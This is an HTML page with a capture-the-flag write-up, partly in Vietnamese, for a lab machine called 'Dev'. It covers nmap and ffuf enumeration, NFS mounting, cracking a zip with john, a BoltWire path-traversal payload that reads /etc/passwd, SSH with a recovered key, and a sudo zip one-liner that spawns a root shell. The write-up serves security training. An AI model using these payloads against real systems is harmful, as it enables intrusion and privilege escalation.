
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Dev TCM - writeup</title>
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
        <link href="https://cdn.jsdelivr.net/npm/lightgallery.js/dist/css/lightgallery.min.css" rel="stylesheet">
        <link href="https://cdn.jsdelivr.net/npm/lg-thumbnail.js/dist/lg-thumbnail.min.css" rel="stylesheet">
        <!-- Add Pygments CSS for code highlighting -->
        <style>pre { line-height: 125%; }
td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
.highlight .hll { background-color: #ffffcc }
.highlight { background: #f8f8f8; }
.highlight .c { color: #3D7B7B; font-style: italic } /* Comment */
.highlight .err { border: 1px solid #FF0000 } /* Error */
.highlight .k { color: #008000; font-weight: bold } /* Keyword */
.highlight .o { color: #666666 } /* Operator */
.highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */
.highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #9C6500 } /* Comment.Preproc */
.highlight .cpf { color: #3D7B7B; font-style: italic } /* Comment.PreprocFile */
.highlight .c1 { color: #3D7B7B; font-style: italic } /* Comment.Single */
.highlight .cs { color: #3D7B7B; font-style: italic } /* Comment.Special */
.highlight .gd { color: #A00000 } /* Generic.Deleted */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .gr { color: #E40000 } /* Generic.Error */
.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */
.highlight .gi { color: #008400 } /* Generic.Inserted */
.highlight .go { color: #717171 } /* Generic.Output */
.highlight .gp { color: #000080; font-weight: bold } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
.highlight .gt { color: #0044DD } /* Generic.Traceback */
.highlight .kc { color: #008000; font-weight: bold } /* Keyword.Constant */
.highlight .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */
.highlight .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */
.highlight .kp { color: #008000 } /* Keyword.Pseudo */
.highlight .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #B00040 } /* Keyword.Type */
.highlight .m { color: #666666 } /* Literal.Number */
.highlight .s { color: #BA2121 } /* Literal.String */
.highlight .na { color: #687822 } /* Name.Attribute */
.highlight .nb { color: #008000 } /* Name.Builtin */
.highlight .nc { color: #0000FF; font-weight: bold } /* Name.Class */
.highlight .no { color: #880000 } /* Name.Constant */
.highlight .nd { color: #AA22FF } /* Name.Decorator */
.highlight .ni { color: #717171; font-weight: bold } /* Name.Entity */
.highlight .ne { color: #CB3F38; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #0000FF } /* Name.Function */
.highlight .nl { color: #767600 } /* Name.Label */
.highlight .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */
.highlight .nt { color: #008000; font-weight: bold } /* Name.Tag */
.highlight .nv { color: #19177C } /* Name.Variable */
.highlight .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mb { color: #666666 } /* Literal.Number.Bin */
.highlight .mf { color: #666666 } /* Literal.Number.Float */
.highlight .mh { color: #666666 } /* Literal.Number.Hex */
.highlight .mi { color: #666666 } /* Literal.Number.Integer */
.highlight .mo { color: #666666 } /* Literal.Number.Oct */
.highlight .sa { color: #BA2121 } /* Literal.String.Affix */
.highlight .sb { color: #BA2121 } /* Literal.String.Backtick */
.highlight .sc { color: #BA2121 } /* Literal.String.Char */
.highlight .dl { color: #BA2121 } /* Literal.String.Delimiter */
.highlight .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */
.highlight .s2 { color: #BA2121 } /* Literal.String.Double */
.highlight .se { color: #AA5D1F; font-weight: bold } /* Literal.String.Escape */
.highlight .sh { color: #BA2121 } /* Literal.String.Heredoc */
.highlight .si { color: #A45A77; font-weight: bold } /* Literal.String.Interpol */
.highlight .sx { color: #008000 } /* Literal.String.Other */
.highlight .sr { color: #A45A77 } /* Literal.String.Regex */
.highlight .s1 { color: #BA2121 } /* Literal.String.Single */
.highlight .ss { color: #19177C } /* Literal.String.Symbol */
.highlight .bp { color: #008000 } /* Name.Builtin.Pseudo */
.highlight .fm { color: #0000FF } /* Name.Function.Magic */
.highlight .vc { color: #19177C } /* Name.Variable.Class */
.highlight .vg { color: #19177C } /* Name.Variable.Global */
.highlight .vi { color: #19177C } /* Name.Variable.Instance */
.highlight .vm { color: #19177C } /* Name.Variable.Magic */
.highlight .il { color: #666666 } /* Literal.Number.Integer.Long */</style>
        <style>
            /* Center the HTML file on the screen */
            body {
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
                padding-top: 30px;
            }
            /* Make the display width of the HTML file smaller */
            .container {
                max-width: 42vw;
                margin: 0 auto;
                height: 100%
            }
            
            img {
                width: 80%;
            }
        </style>
        <script src="https://cdn.jsdelivr.net/npm/lightgallery.js/dist/js/lightgallery.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-thumbnail.js/dist/lg-thumbnail.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-zoom.js/dist/lg-zoom.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-fullscreen.js/dist/lg-fullscreen.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-share.js/dist/lg-share.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-autoplay.js/dist/lg-autoplay.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-rotate.js/dist/lg-rotate.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-flip.js/dist/lg-flip.min.js"></script>
        <script>
            window.onload = function() {
                const images = document.getElementsByTagName('img');
                const lightGalleryItems = [];
                for (let i = 0; i < images.length; i++) {
                    const img = images[i];
                    if (img.naturalWidth > 1000) {
                        if (window.innerWidth > 768) {
                            img.style.width = '110%';
                            img.style.transform = 'translateX(-4%)';
                        } else {
                            img.style.width = '100%';
                            img.style.transform = 'none';
                        }
                    }
                    lightGalleryItems.push({ src: img.src, thumb: img.src });
                    img.setAttribute('data-lg-idx', i);
                    img.addEventListener('click', function() {
                        lightGallery(img, {
                            dynamic: true,
                            dynamicEl: lightGalleryItems,
                            index: parseInt(img.getAttribute('data-lg-idx'))
                        });
                    });
                }
            };
        </script>
    </head>
    <body>
        <div class="container">
            <div class="row">
                <div class="col">
                    <h1 style="text-align:center; text-transform:uppercase; font-family: 'Playfair Display', serif; font-weight:700;"">Dev</h1>

<p>Tuesday, August 2, 2022</p>
<p>11:00 PM</p>
<p>nmap -A -p- -T4 192.168.1.9</p>
<p>Starting Nmap 7.92 (  ) at 2022-08-02 05:25 EDT</p>
<p>Nmap scan report for 192.168.1.9</p>
<p>Host is up (0.00063s latency).</p>
<p>Not shown: 65526 closed tcp ports (conn-refused)</p>
<p>PORT      STATE SERVICE  VERSION</p>
<p>22/tcp    open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)</p>
<p>| ssh-hostkey:</p>
<p>|   2048 bd:96:ec:08:2f:b1:ea:06:ca:fc:46:8a:7e:8a:e3:55 (RSA)</p>
<p>|   256 56:32:3b:9f:48:2d:e0:7e:1b:df:20:f8:03:60:56:5e (ECDSA)</p>
<p>|_  256 95:dd:20:ee:6f:01:b6:e1:43:2e:3c:f4:38:03:5b:36 (ED25519)</p>
<p>80/tcp    open  http     Apache httpd 2.4.38 ((Debian))</p>
<p>|_http-server-header: Apache/2.4.38 (Debian)</p>
<p>|_http-title: Bolt - Installation error</p>
<p>111/tcp   open  rpcbind  2-4 (RPC #100000)</p>
<p>| rpcinfo:</p>
<p>|   program version    port/proto  service</p>
<p>|   100000  2,3,4        111/tcp   rpcbind</p>
<p>|   100000  2,3,4        111/udp   rpcbind</p>
<p>|   100000  3,4          111/tcp6  rpcbind</p>
<p>|   100000  3,4          111/udp6  rpcbind</p>
<p>|   100003  3           2049/udp   nfs</p>
<p>|   100003  3           2049/udp6  nfs</p>
<p>|   100003  3,4         2049/tcp   nfs</p>
<p>|   100003  3,4         2049/tcp6  nfs</p>
<p>|   100005  1,2,3      44395/tcp   mountd</p>
<p>|   100005  1,2,3      44467/udp   mountd</p>
<p>|   100005  1,2,3      50603/udp6  mountd</p>
<p>|   100005  1,2,3      50615/tcp6  mountd</p>
<p>|   100021  1,3,4      33353/tcp   nlockmgr</p>
<p>|   100021  1,3,4      34439/udp6  nlockmgr</p>
<p>|   100021  1,3,4      41307/tcp6  nlockmgr</p>
<p>|   100021  1,3,4      60353/udp   nlockmgr</p>
<p>|   100227  3           2049/tcp   nfs_acl</p>
<p>|   100227  3           2049/tcp6  nfs_acl</p>
<p>|   100227  3           2049/udp   nfs_acl</p>
<p>|_  100227  3           2049/udp6  nfs_acl</p>
<p>2049/tcp  open  nfs_acl  3 (RPC #100227)</p>
<p>8080/tcp  open  http     Apache httpd 2.4.38 ((Debian))</p>
<p>|_http-server-header: Apache/2.4.38 (Debian)</p>
<p>| http-open-proxy: Potentially OPEN proxy.</p>
<p>|_Methods supported:CONNECTION</p>
<p>|_http-title: PHP 7.3.27-1~deb10u1 - phpinfo()</p>
<p>33353/tcp open  nlockmgr 1-4 (RPC #100021)</p>
<p>34621/tcp open  mountd   1-3 (RPC #100005)</p>
<p>44395/tcp open  mountd   1-3 (RPC #100005)</p>
<p>47567/tcp open  mountd   1-3 (RPC #100005)</p>
<p>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</p>
<p>ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u</p>
<p>public                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 1ms]</p>
<h1>Attribution-Share Alike 3.0 License. To view a copy of this  [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 204ms]</h1>
<h1>This work is licensed under the Creative Commons  [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 216ms]</h1>
<h1>Copyright 2007 James Fisher [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 245ms]</h1>
<p>src                     [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 1ms]</p>
<p>app                     [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 1ms]</p>
<h1>[Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 452ms]</h1>
<h1>directory-list-2.3-medium.txt [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 466ms]</h1>
<p>vendor                  [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 1ms]</p>
<p>extensions              [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 2ms]</p>
<p>ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u</p>
<p>dev                     [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 3ms]</p>
<p>ENUM NFS</p>
<p>$ showmount -e 192.168.1.9</p>
<p>Export list for 192.168.1.9:</p>
<p>/srv/nfs 172.16.0.0/12,10.0.0.0/8,192.168.0.0/16</p>
<p>$ sudo mount -t nfs 192.168.1.9:/srv/nfs /mnt/dev</p>
<p>we have save.zip in nfs</p>
<p>zip2john save.zip &gt; save.hashes</p>
<p>$ john save.hashes</p>
<p>Using default input encoding: UTF-8</p>
<p>Loaded 1 password hash (PKZIP [32/64])</p>
<p>Will run 3 OpenMP threads</p>
<p>Proceeding with single, rules:Single</p>
<p>Press 'q' or Ctrl-C to abort, almost any other key for status</p>
<p>Almost done: Processing the remaining buffered candidate passwords, if any.</p>
<p>Proceeding with wordlist:/usr/share/john/password.lst</p>
<p>Proceeding with incremental:ASCII</p>
<p>java101          (save.zip)</p>
<p>1g 0:00:00:06 DONE 3/3 (2022-08-02 05:45) 0.1661g/s 5571Kp/s 5571Kc/s 5571KC/s bbs0048..javona1</p>
<p>Use the "--show" option to display all of the cracked passwords reliably</p>
<p>Session completed.</p>
<p>unzip save.zip</p>
<p>Archive:  save.zip</p>
<p>[save.zip] id_rsa password:</p>
<p>skipping: id_rsa                  incorrect password</p>
<p>skipping: todo.txt                incorrect password</p>
<p>download file config.yaml</p>
<p>database:</p>
<p>driver: sqlite</p>
<p>databasename: bolt</p>
<p>username: bolt</p>
<p>password: I_love_java</p>
<p>signup account in  and add payload index.php?p=action.search&amp;action=../../../../../../../etc/passwd to exploit boltwire ( refer exploitdb )</p>
<p>root:x:0:0:root:/root:/bin/bash</p>
<p>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</p>
<p>bin:x:2:2:bin:/bin:/usr/sbin/nologin</p>
<p>sys:x:3:3:sys:/dev:/usr/sbin/nologin</p>
<p>sync:x:4:65534:sync:/bin:/bin/sync</p>
<p>games:x:5:60:games:/usr/games:/usr/sbin/nologin</p>
<p>man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</p>
<p>lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</p>
<p>mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</p>
<p>uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</p>
<p>proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</p>
<p>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</p>
<p>backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</p>
<p>list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</p>
<p>irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</p>
<p>gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</p>
<p>nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</p>
<p>_apt:x:100:65534::/nonexistent:/usr/sbin/nologin</p>
<p>systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin</p>
<p>systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin</p>
<p>systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin</p>
<p>messagebus:x:104:110::/nonexistent:/usr/sbin/nologin</p>
<p>sshd:x:105:65534::/run/sshd:/usr/sbin/nologin</p>
<p>jeanpaul:x:1000:1000:jeanpaul,,,:/home/jeanpaul:/bin/bash</p>
<p>systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin</p>
<p>mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false</p>
<p>_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin</p>
<p>statd:x:108:65534::/var/lib/nfs:/usr/sbin/nologin</p>
<p>Ở đây có tài khoản jeanpaul có điểm tương đồng với jp trong file kiếm được, thử ssh lại</p>
<p>ssh -i id_rsa jeanpaul@192.168.1.9</p>
<p>Enter passphrase for key 'id_rsa':</p>
<p>thử passphrase I_love_java trong file conf</p>
<p>jeanpaul@dev:~$ sudo -l</p>
<p>Matching Defaults entries for jeanpaul on dev:</p>
<p>env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin</p>
<p>User jeanpaul may run the following commands on dev:</p>
<p>(root) NOPASSWD: /usr/bin/zip</p>
<p>ở đây chúng ta có zip, chúng ta vào trang  phần sudo để leo thang</p>
<p>jeanpaul@dev:~$ TF=$(mktemp -u)</p>
<p>jeanpaul@dev:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'</p>
<p>adding: etc/hosts (deflated 31%)</p>
<h1>whoami</h1>
<p>root</p>
<h1>cd root</h1>
<h1>ls</h1>
<p>flag.txt</p>
<h1>cat flag.txt</h1>
<p>Congratz on rooting this box !</p>
                </div>
            </div>
        </div>    
    </body>
    </html>
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<style>

.copy-button {
  position: absolute;
  right: 5px ;
  top: 5px;
  border: transparent;
  background-color: transparent;
  padding: 2px 6px;
  cursor: pointer;
  font-size: 14px;
  color: #333;
  border-radius: 8px;

}

.copy-button:hover {
  background-color: #30363d; # Change this to a different color to create a hover effect
}
.material-icons{
  line-height:1.3;
  color: #7d8590;
}

pre {
  position: relative;
  # padding: 20px;
  border: 1px solid #e7ee7;
  overflow-x: auto; # Remove this line to disable horizontal scrolling
  font-size: 14px;
  line-height: 1.5;
  border-radius: 6px;
  margin-bottom: 20px;

  # Add these lines to set a fixed width for the code block and wrap long lines
  #width: 80%;
  white-space: pre-wrap; 
}

pre code {
  display: block;
  border-radius: 8px;
  background-color: #2d2d2d; # Change this to a different color to match the copy button background

}




@media only screen and (min-width: 280px) {
  img {
    width: 85%; /* Make image smaller on tablets and mobiles */
  }
}

@media only screen and (max-width: 768px) {
  img {
    width: 85%; /* Make image smaller on tablets and desktops */
  }
}

# @media (min-width: 576px) {
#   img {
#     max-width: 540px;
#   }
# }

# @media (min-width: 768px) {
#   img {
#     max-width: 720px;
#   }
# }



@media (min-width: 280px) {
  .container {
    max-width: 90%;
    margin: 0 auto;
    height: 100%;
  }
}

@media (min-width: 750px) {
  .container {
    max-width: 80%;
    margin: 0 auto;
    height: 100%;
  }
}



@media (min-width: 912px) {
  .container {
    max-width: 70%;
    margin: 0 auto;
    height: 100%;
  }
}

# @media (min-width: 1200px) {
#   .container {
#     max-width: 70%;
#     margin: 0 auto;
#     height: 100%;
#   }
# }

# @media (min-width: 576px) {
#   .container {
#     max-width: 540px;
#   }
# }

# @media (min-width: 768px) {
#   .container {
#     max-width: 620px;
#     margin: 0;
#   }
# }

# @media (min-width: 992px) {
#   .container {
#     max-width: 760px;
#   }
# }

@media (min-width: 1200px) {
  .container {
    max-width: 735px;
    margin: 0;
    height: 100%;
  }
}

# p { 
#   text-indent: 10px;
# }

h2 {
  font-size: 1.5rem;
}

h3 {
  font-size: 1.3rem;
}

# .container {
#   max-width: 100%; /* Set the container width to 100% */
#   padding-left: 15px; /* Add some padding to the left */
#   padding-right: 15px; /* Add some padding to the right */
# }


</style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.7.2/highlight.min.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/atom-one-dark-reasonable.min.css">

<script>
  document.addEventListener('DOMContentLoaded', function() {
    var codeBlocks = document.querySelectorAll('pre code');
    codeBlocks.forEach(function(codeBlock) {
      var copyButton = document.createElement('button');
      copyButton.innerHTML = '<i class="material-icons">content_copy</i>';
      copyButton.classList.add('copy-button');
      codeBlock.parentNode.insertBefore(copyButton, codeBlock);

      copyButton.addEventListener('click', function() {
        var code = codeBlock.textContent;
        var textarea = document.createElement('textarea');
        textarea.textContent = code;
        document.body.appendChild(textarea);
        textarea.select();
        document.execCommand('copy');
        textarea.remove();
        copyButton.innerHTML = '<i class="material-icons">check</i>';
        setTimeout(function() {
          copyButton.innerHTML = '<i class="material-icons">content_copy</i>';
        }, 2000);
      });
    });

    // Initialize highlight.js for syntax highlighting
    hljs.initHighlightingOnLoad();
  });
</script>
